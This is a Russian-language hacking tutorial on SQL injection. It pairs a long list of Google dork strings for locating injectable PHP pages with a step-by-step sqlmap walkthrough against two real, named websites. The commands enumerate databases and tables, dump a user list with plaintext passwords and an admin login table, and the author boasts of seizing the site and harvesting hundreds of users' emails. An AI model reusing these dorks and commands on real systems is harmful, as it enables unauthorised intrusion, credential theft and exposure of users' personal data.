Взлом сайта с помощью SQL-инъекции.

Google Dork string Column 1Google Dork string Column 2Google Dork string Column 3
inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id=
inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id=
inurl:trainers.php?id= inurl:curriculum.php?id= inurl:rub.php?idr=
inurl:news-full.php?id= inurl:labels.php?id= inurl:view_faq.php?id=
inurl:news_display.php?getid= inurl:story.php?id= inurl:artikelinfo.php?id=
inurl:index2.php?option= inurl:look.php?ID= inurl:detail.php?ID=
inurl:readnews.php?id= inurl:newsone.php?id= inurl:index.php?=
inurl:top10.php?cat= inurl:aboutbook.php?id= inurl:profile_view.php?id=
inurl:newsone.php?id= inurl:material.php?id= inurl:category.php?id=
inurl:event.php?id= inurl:opinions.php?id= inurl:publications.php?id=
inurl:product-item.php?id= inurl:announce.php?id= inurl:fellows.php?id=
inurl:sql.php?id= inurl:rub.php?idr= inurl:downloads_info.php?id=
inurl:index.php?catid= inurl:galeri_info.php?l= inurl:prod_info.php?id=
inurl:news.php?catid= inurl:tekst.php?idt= inurl:shop.php?do=part&id=
inurl:index.php?id= inurl:newscat.php?id= inurl:productinfo.php?id=
inurl:news.php?id= inurl:newsticker_info.php?idn= inurl:collectionitem.php?id=
inurl:index.php?id= inurl:rubrika.php?idr= inurl:band_info.php?id=
inurl:trainers.php?id= inurl:rubp.php?idr= inurl:product.php?id=
inurl:buy.php?category= inurl:offer.php?idf= inurl:releases.php?id=
inurl:article.php?ID= inurl:art.php?idm= inurl:ray.php?id=
inurl:play_old.php?id= inurl:title.php?id= inurl:produit.php?id=
inurl:declaration_more.php?decl_id= inurl:news_view.php?id= inurl:pop.php?id=
inurl:pageid= inurl:select_biblio.php?id= inurl:shopping.php?id=
inurl:games.php?id= inurl:humor.php?id= inurl:productdetail.php?id=
inurl:page.php?file= inurl:aboutbook.php?id= inurl:post.php?id=
inurl:newsDetail.php?id= inurl:ogl_inet.php?ogl_id= inurl:viewshowdetail.php?id=
inurl:gallery.php?id= inurl:fiche_spectacle.php?id= inurl:clubpage.php?id=
inurl:article.php?id= inurl:communique_detail.php?id= inurl:memberInfo.php?id=
inurl:show.php?id= inurl:sem.php3?id= inurl:section.php?id=
inurl:staff_id= inurl:kategorie.php4?id= inurl:theme.php?id=
inurl:newsitem.php?num= inurl:news.php?id= inurl:page.php?id=
inurl:readnews.php?id= inurl:index.php?id= inurl:shredder-categories.php?id=
inurl:top10.php?cat= inurl:faq2.php?id= inurl:tradeCategory.php?id=
inurl:historialeer.php?num= inurl:show_an.php?id= inurl:product_ranges_view.php?ID=
inurl:reagir.php?num= inurl:preview.php?id= inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num= inurl:loadpsb.php?id= inurl:transcript.php?id=
inurl:forum_bds.php?num= inurl:opinions.php?id= inurl:channel_id=
inurl:game.php?id= inurl:spr.php?id= inurl:aboutbook.php?id=
inurl:view_product.php?id= inurl:pages.php?id= inurl:preview.php?id=
inurl:newsone.php?id= inurl:announce.php?id= inurl:loadpsb.php?id=
inurl:sw_comment.php?id= inurl:clanek.php4?id= inurl:pages.php?id=
inurl:news.php?id= inurl:participant.php?id=  
inurl:avd_start.php?avd= inurl:download.php?id=  
inurl:event.php?id= inurl:main.php?id=  
inurl:product-item.php?id= inurl:review.php?id=  
inurl:sql.php?id= inurl:chappies.php?id=  
inurl:material.php?id= inurl:read.php?id=  
inurl:clanek.php4?id= inurl:prod_detail.php?id=  
inurl:announce.php?id= inurl:viewphoto.php?id=  
inurl:chappies.php?id= inurl:article.php?id=  
inurl:read.php?id= inurl:person.php?id=  
inurl:viewapp.php?id= inurl:productinfo.php?id=  
inurl:viewphoto.php?id= inurl:showimg.php?id=  
inurl:rub.php?idr= inurl:view.php?id=  
inurl:galeri_info.php?l= inurl:website.php?id=

Для начала, ищем уязвимые сайты при помощи гугл-дорков.

Они собраны в таблице выше. Гугель нам шото выдал.

Первый в списке выдачи, футбольный сайт. Вот его и проверим при помощи одиночной кавычки ', вставив её в конце ссылки в адресной строке. Адрес  выглядит так http://italyfutbol.ru/rubrika.php?id=11, потом, вот так 

Сайтина ответила ошибкой на запрос. Это значит, что страница уязвима для SQLMAP SQL-инъекции.

Сейчас нужно построить список всех баз данных уязвимой СУБД. Для атаки, буду использовать программулину SQLMAP, она также скажет мне, какая переменная является уязвимой.

Запустим следующую команду в отношении уязвимого веб-сайта.

sqlmap -u www.italyfutbol.ru/rubrika.php?id=11 --dbs

Паняслася....

Эта команда раскрыла совсем немного интересной информации. Начинаем лазить по базам данных в поиске администратора, суперюсера, чтоб потырить пароль владельца сайта.

Нам нужно знать как много таблиц имеется в СУБД этого веб-сайта и какие у них имена. Чтобы найти эту информацию выполняем следующую команду:

sqlmap -u www.italyfutbol.ru/rubrika.php?id=11 -D allrecords --tables

Ни админа или администратора, ничего похожего не найдено. Зато, вот чего нашлось!

Попробуем вскрыть юзер-лист. Вводим команду

sqlmap -u www.italyfutbol.ru/rubrika.php?id=11 -D allrecords -T userlist --columns
И получаем интересный результат.

Ага! Это именно то, что искала. А именно, в этой таблице содержится логин с паролем. Проводим следующую инъекцию командой

sqlmap -u www.italyfutbol.ru/rubrika.php?id=11 -D allrecords -T userlist --dump

Ебааать ту Люсю! Пароль в незашифрованном виде! У предыдущего сайта, был выдан хеш пароля.

Следующий шаг, надо найти админку данного сайта. Гуглить не стала, у мну есть программулина поиска админок.

Нашла одну админку.

Вот в общем то и всё! Сайт захвачен. Написала владельцу о взломе и шоп как можно быстрей устранил уязвимость и поменял пароль в админке.

Эта команда, сливает всю базу почт зарегистрированных пользователей на сайте. База уже с другого ресурса.

sqlmap -u www.pulset.ru/club/rubrika.php?id_ru=81 -D club_media -T t_admin -C login --dump

для примера несколько взяла.

хватит и трёх. Их там несколько сотен.

Исследую утилиту дальше, интересно же, каковы её возможности.